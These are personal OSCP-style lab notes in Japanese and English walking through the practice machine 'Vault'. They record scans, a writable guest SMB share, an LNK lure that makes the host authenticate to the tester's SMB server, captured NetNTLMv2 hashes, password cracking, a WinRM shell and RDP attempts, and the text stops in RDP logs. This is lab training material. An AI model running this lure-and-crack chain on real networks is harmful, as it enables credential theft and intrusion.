Vault¶
Flag-Critical Knowledge¶
トリガー、攻撃パターン¶
attack summary¶
Guest SMB login
→ writable DocumentsShare
→ ntlm_theft LNK lure
→ capture ANIRUDH NetNTLMv2
→ crack password: SecureHM
→ WinRM as ANIRUDH
→ BloodHound finds GPO write path
→ SharpGPOAbuse adds ANIRUDH to local Administrators
→ gpupdate
→ read Administrator proof.txt
walkthrough¶
- [ ] スクショ
- [ ] マークダウンの書き方を整えて
こういうところ これは何秒までなら許容??? |_clock-skew: 14s ⇒5分(300秒)を超えると認証失敗の可能性あり
192.168.206.172 DC.vault.offsec
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-28 23:05:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-28T23:06:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2026-06-27T23:02:42
|_Not valid after: 2026-12-27T23:02:42
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-28T23:06:08+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-06-28T23:06:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.42 seconds
[!!!] Domain Controller found on 192.168.206.172
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-29 08:06 JST
Nmap scan report for 192.168.206.172
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD:
| _services
| _dns-sd
| _udp
| local
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
88/udp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-28 23:06:55Z)
123/udp open ntp NTP v3
| ntp-info:
|_
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.95%I=7%D=6/29%Time=6A41A91E%P=aarch64-unknown-linux-gnu%
SF:r(DNS-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_u
SF:dp\x05local\0\0\x0c\0\x01")%r(NBTStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\
SF:0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.53 seconds
[!!!] DNS server found on 192.168.206.172
[*] Scan completed.
これは何秒までなら許容?
|_clock-skew: 14s
⇒5分(300秒)を超えると認証失敗の可能性あり
sudo ntpdate <DC_IP>
sudo rdate -n <DC_IP>
9389/tcp open mc-nmf .NET Message Framing
⇒Active Directory Web Services (ADWS)のポート。DCで開いてる。
dns列挙
nmap -sCV -p53 192.168.206.172 -oA scans/192.168.206.172-dns
dig @192.168.206.172 vault.offsec any
dig axfr @192.168.206.172 vault.offsec
dnsrecon -d vault.offsec -n 192.168.206.172
kerberos列挙
nmap -sCV -p88 192.168.206.172 -oA scans/192.168.206.172-kerberos
kerbrute userenum -d vault.offsec users.txt --dc 192.168.206.172
impacket-GetNPUsers vault.offsec/ -usersfile users.txt -dc-ip 192.168.206.172 -no-pass -format hashcat -outputfile asrep.hash
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
⇒ユーザ名が取れてから
ldap列挙
ldapsearch -x -H ldap://192.168.206.172 -s base namingContexts
ldapsearch -x -H ldap://192.168.206.172 -b "DC=vault,DC=offsec"
msrpc列挙 smb列挙
nxc smb 192.168.206.172
nxc smb 192.168.206.172 -u '' -p ''
nxc smb 192.168.206.172 -u guest -p ''
enum4linux-ng 192.168.206.172
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ nxc smb 192.168.206.172 -u guest -p ''
SMB 192.168.206.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.206.172 445 DC [+] vault.offsec\guest:
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
smbのguestが有効
nxc smb 192.168.206.172 -u guest -p '' --shares
nxc smb 192.168.206.172 -u guest -p '' --users
nxc ldap 192.168.206.172 -u guest -p '' --groups
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ nxc smb 192.168.206.172 -u guest -p '' --shares
SMB 192.168.206.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.206.172 445 DC [+] vault.offsec\guest:
SMB 192.168.206.172 445 DC [*] Enumerated shares
SMB 192.168.206.172 445 DC Share Permissions Remark
SMB 192.168.206.172 445 DC ----- ----------- ------
SMB 192.168.206.172 445 DC ADMIN$ Remote Admin
SMB 192.168.206.172 445 DC C$ Default share
SMB 192.168.206.172 445 DC DocumentsShare READ,WRITE
SMB 192.168.206.172 445 DC IPC$ READ Remote IPC
SMB 192.168.206.172 445 DC NETLOGON Logon server share
SMB 192.168.206.172 445 DC SYSVOL Logon server share
DocumentsShareにアクセス
smbclient //192.168.206.172/<SHARE> -U 'guest%'
smbclient //192.168.206.172/<SHARE> -U guest --password=''
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ smbclient //192.168.206.172/DocumentsShare -U 'guest%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 29 22:42:40 2026
.. D 0 Mon Jun 29 22:42:40 2026
7706623 blocks of size 4096. 1913864 blocks available
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Mon Jun 29 22:59:44 2026
.. D 0 Mon Jun 29 22:59:44 2026
test.txt A 5 Mon Jun 29 22:59:44 2026
7706623 blocks of size 4096. 1913656 blocks available
smb: \> exit
* ntlm_theft
https://github.com/Greenwolf/ntlm_theft
git clone https://github.com/Greenwolf/ntlm_theft.git
cd ntlm_theft
python3 ntlm_theft.py -g lnk -s <kali ip> -f vault
python3 ntlm_theft.py -g lnk -s 192.168.45.187 -f vault
ntlm_theft.pyだけwgetしてもlnkファイルを作成できなかった。
┌──(kali@kali)-[~/…/pGpractice/Vault/192.168.206.172/ntlm_theft]
└─$ python3 ntlm_theft.py -g lnk -s 192.168.45.187 -f vault
/home/kali/oscp/pGpractice/Vault/192.168.206.172/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: vault/vault.lnk (BROWSE TO FOLDER)
Generation Complete.
┌──(kali@kali)-[~/…/pGpractice/Vault/192.168.206.172/ntlm_theft]
└─$ cd vault
┌──(kali@kali)-[~/…/Vault/192.168.206.172/ntlm_theft/vault]
└─$ ls
vault.lnk
┌──(kali@kali)-[~/…/Vault/192.168.206.172/ntlm_theft/vault]
└─$
smbclient //192.168.206.172/DocumentsShare -U 'guest%'
put vault.lnk
impacket-smbserver test . -smb2support
or
sudo responder -I tun0 -v
responderの 「SMB server [OFF]」になっている場合は、 設定ファイル
/usr/share/responder/Responder.conf
の SMB = Off を SMB = On にする
┌──(kali@kali)-[~/…/Vault/192.168.206.172/ntlm_theft/vault]
└─$ smbclient //192.168.206.172/DocumentsShare -U 'guest%'
Try "help" to get a list of possible commands.
smb: \> put vault.lnk
putting file vault.lnk as \vault.lnk (8.6 kb/s) (average 8.6 kb/s)
smb: \>
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ impacket-smbserver test . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.206.172,53894)
[*] AUTHENTICATE_MESSAGE (VAULT\anirudh,DC)
[*] User DC\anirudh authenticated successfully
[*] anirudh::VAULT:aaaaaaaaaaaaaaaa:42b3c7e073962198970c43f9698ec767:010100000000000000ccb9e8d207dd011e85c2c0dd5742bf0000000001001000660073006b0058006e00550063004b0003001000660073006b0058006e00550063004b00020010006f0046006d0049004200590053006c00040010006f0046006d0049004200590053006c000700080000ccb9e8d207dd01060004000200000008003000300000000000000001000000002000001830f0c706803f0173332094f5b2bb5fb0c4dad79922348512363cc7dc51c8100a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380037000000000000000000
[*] Closing down connection (192.168.206.172,53894)
[*] Remaining connections []
[*] Incoming connection (192.168.206.172,53895)
[*] AUTHENTICATE_MESSAGE (VAULT\anirudh,DC)
[*] User DC\anirudh authenticated successfully
[*] anirudh::VAULT:aaaaaaaaaaaaaaaa:302445fa29611da27defdb8c7900d78e:0101000000000000806252e9d207dd011b198ae75f3c01e50000000001001000660073006b0058006e00550063004b0003001000660073006b0058006e00550063004b00020010006f0046006d0049004200590053006c00040010006f0046006d0049004200590053006c0007000800806252e9d207dd01060004000200000008003000300000000000000001000000002000001830f0c706803f0173332094f5b2bb5fb0c4dad79922348512363cc7dc51c8100a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380037000000000000000000
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ sudo responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [192.168.45.187]
Responder IPv6 [fe80::fbbc:68f5:361b:7d4e]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-7WPO025JBR7]
Responder Domain Name [QSVT.LOCAL]
Responder DCE-RPC Port [48597]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.206.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:dc188f2b79d767c5:0F4418651B48B0F8C93361A81C4D6C55:01010000000000008081448A080CDD01DAD9AC231F3C96620000000002000800510053005600540001001E00570049004E002D003700570050004F003000320035004A0042005200370004003400570049004E002D003700570050004F003000320035004A004200520037002E0051005300560054002E004C004F00430041004C000300140051005300560054002E004C004F00430041004C000500140051005300560054002E004C004F00430041004C00070008008081448A080CDD01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380037000000000000000000
[SMB] NTLMv2-SSP Client : 192.168.206.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash :
hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt
or
john anirudh.hash --wordlist=/usr/share/wordlists/rockyou.txt
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 1435/2935 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:13a17a1b099c6b5b04958f8358fedaf6:010100000000000000393636d307dd01481e0e631c01ff7f00000000010010006100420075004d0072004d0076005100030010006100420075004d0072004d0076005100020010004a006800410054006e0063006a005200040010004a006800410054006e0063006a0052000700080000393636d307dd01060004000200000008003000300000000000000001000000002000001830f0c706803f0173332094f5b2bb5fb0c4dad79922348512363cc7dc51c8100a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380037000000000000000000:SecureHM
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:13a17a1b099c6b5b049...000000
Time.Started.....: Mon Jun 29 23:26:42 2026 (7 secs)
Time.Estimated...: Mon Jun 29 23:26:49 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1548.5 kH/s (0.28ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10609152/14344385 (73.96%)
Rejected.........: 0/10609152 (0.00%)
Restore.Point....: 10608640/14344385 (73.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Sekhmet* -> Searston87
Hardware.Mon.#1..: Util: 95%
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Mon Jun 29 23:26:41 2026
Stopped: Mon Jun 29 23:26:51 2026
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ john anirudh.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:05 DONE (2026-07-05 20:21) 0.1828g/s 1940Kp/s 1940Kc/s 1940KC/s Seifer@14..Sabertooth
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
ANIRUDH SecureHM
for p in smb rdp winrm; do nxc $p 192.168.206.172 -u anirudh -p 'SecureHM'; done
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ for p in smb rdp winrm; do nxc $p 192.168.206.172 -u anirudh -p 'SecureHM'; done
SMB 192.168.206.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.206.172 445 DC [+] vault.offsec\anirudh:SecureHM
RDP 192.168.206.172 3389 DC [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:vault.offsec) (nla:False)
RDP 192.168.206.172 3389 DC [+] vault.offsec\anirudh:SecureHM
WINRM 192.168.206.172 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.206.172 5985 DC [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
evil-winrm -i 192.168.206.172 -u ANIRUDH -p "SecureHM"
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ evil-winrm -i 192.168.206.172 -u ANIRUDH -p "SecureHM"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents>
winrmでログインできた。
xfreerdp /v:192.168.206.172 /u:ANIRUDH /p:"SecureHM" /cert:ignore
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:rdp -gfx /bpp:16
xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:'anirudh' /p:'SecureHM' /v:vault.offsec
⇒できない
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls -gfx /bpp:16
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls '/auth-pkg-list:!kerberos,ntlm' -gfx /bpp:16
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls '/auth-pkg-list:!kerberos,ntlm' /bpp:16 /size:1280x720 -wallpaper -themes -fonts -clipboard -sound
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls /bpp:16 /size:1280x720 -wallpaper -themes -fonts -clipboard -sound
xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls '/auth-pkg-list:!kerberos,ntlm' /bpp:16 /size:1280x720 -wallpaper -themes -fonts -clipboard -sound
rdesktop -d vault.offsec -u ANIRUDH -p SecureHM 192.168.206.172
⇒できた 「/sec:tls」をつけるのが肝らしい
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ xfreerdp /v:192.168.206.172 /u:ANIRUDH /p:"SecureHM" /cert:ignore
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Using /p is insecure
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Passing credentials or secrets via command line might expose these in the process list
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Consider using one of the following (more secure) alternatives:
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /args-from: pipe in arguments from stdin, file or file descriptor
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /from-stdin pass the credential via stdin
[23:15:28:860] [961615:000eac4f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - set environment variable FREERDP_ASKPASS to have a gui tool query for credentials
[23:15:28:866] [961615:000eac51] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[23:15:28:866] [961615:000eac51] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5d -> no RDP scancode found
[23:15:28:867] [961615:000eac51] [WARN][com.freerdp.codec.nsc.neon] - [nsc_init_neon_int]: TODO: Implement neon optimized version of this function
[23:15:29:232] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Certificate not checked, /cert:ignore in use.
[23:15:29:232] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] This prevents MITM attacks from being detected!
[23:15:29:232] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Avoid using this unless in a secure LAN (=no internet) environment
[23:15:29:233] [961615:000eac51] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[23:15:29:234] [961615:000eac51] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[23:15:29:500] [961615:000eac51] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[23:15:29:500] [961615:000eac51] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:15:29:502] [961615:000eac51] [WARN][com.freerdp.codec.nsc.neon] - [nsc_init_neon_int]: TODO: Implement neon optimized version of this function
[23:15:29:865] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Certificate not checked, /cert:ignore in use.
[23:15:29:865] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] This prevents MITM attacks from being detected!
[23:15:29:865] [961615:000eac51] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Avoid using this unless in a secure LAN (=no internet) environment
[23:15:29:865] [961615:000eac51] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[23:15:29:865] [961615:000eac51] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[23:15:30:130] [961615:000eac51] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[23:15:30:130] [961615:000eac51] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:15:30:130] [961615:000eac51] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failed
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:rdp -gfx /bpp:16
[23:15:35:540] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Using /p is insecure
[23:15:35:540] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Passing credentials or secrets via command line might expose these in the process list
[23:15:35:541] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Consider using one of the following (more secure) alternatives:
[23:15:35:541] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /args-from: pipe in arguments from stdin, file or file descriptor
[23:15:35:541] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /from-stdin pass the credential via stdin
[23:15:35:541] [961679:000eac8f] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - set environment variable FREERDP_ASKPASS to have a gui tool query for credentials
[23:15:35:553] [961679:000eac91] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[23:15:35:553] [961679:000eac91] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5d -> no RDP scancode found
[23:15:35:555] [961679:000eac91] [WARN][com.freerdp.codec.nsc.neon] - [nsc_init_neon_int]: TODO: Implement neon optimized version of this function
[23:15:35:740] [961679:000eac91] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[23:15:35:740] [961679:000eac91] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:15:35:742] [961679:000eac91] [WARN][com.freerdp.codec.nsc.neon] - [nsc_init_neon_int]: TODO: Implement neon optimized version of this function
[23:15:35:924] [961679:000eac91] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[23:15:35:924] [961679:000eac91] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:15:35:924] [961679:000eac91] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failed
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ xfreerdp /v:192.168.206.172 /d:vault.offsec /u:ANIRUDH /p:'SecureHM' /cert:ignore /sec:tls -gfx /bpp:16
[23:16:31:876] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Using /p is insecure
[23:16:31:878] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Passing credentials or secrets via command line might expose these in the process list
[23:16:31:878] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: Consider using one of the following (more secure) alternatives:
[23:16:31:878] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /args-from: pipe in arguments from stdin, file or file descriptor
[23:16:31:878] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /from-stdin pass the credential via stdin
[23:16:31:878] [962148:000eae64] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - set environment variable FREERDP_ASKPASS to have a gui tool query for credentials
[23:16:31:898] [962148:000eae66] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[23:16:31:898] [962148:000eae66] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5d -> no RDP scancode found
[23:16:31:902] [962148:000eae66] [WARN][com.freerdp.codec.nsc.neon] - [nsc_init_neon_int]: TODO: Implement neon optimized version of this function
[23:16:32:296] [962148:000eae66] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Certificate not checked, /cert:ignore in use.
[23:16:32:297] [962148:000eae66] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] This prevents MITM attacks from being detected!
[23:16:32:297] [962148:000eae66] [WARN][com.freerdp.crypto] - [tls_verify_certificate]: [DANGER] Avoid using this unless in a secure LAN (=no internet) environment
[23:16:33:346] [962148:000eae66] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Local framebuffer format PIXEL_FORMAT_BGRX32
[23:16:33:346] [962148:000eae66] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format PIXEL_FORMAT_BGRA32
[23:16:33:379] [962148:000eae66] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [static] Loaded fake backend for rdpsnd
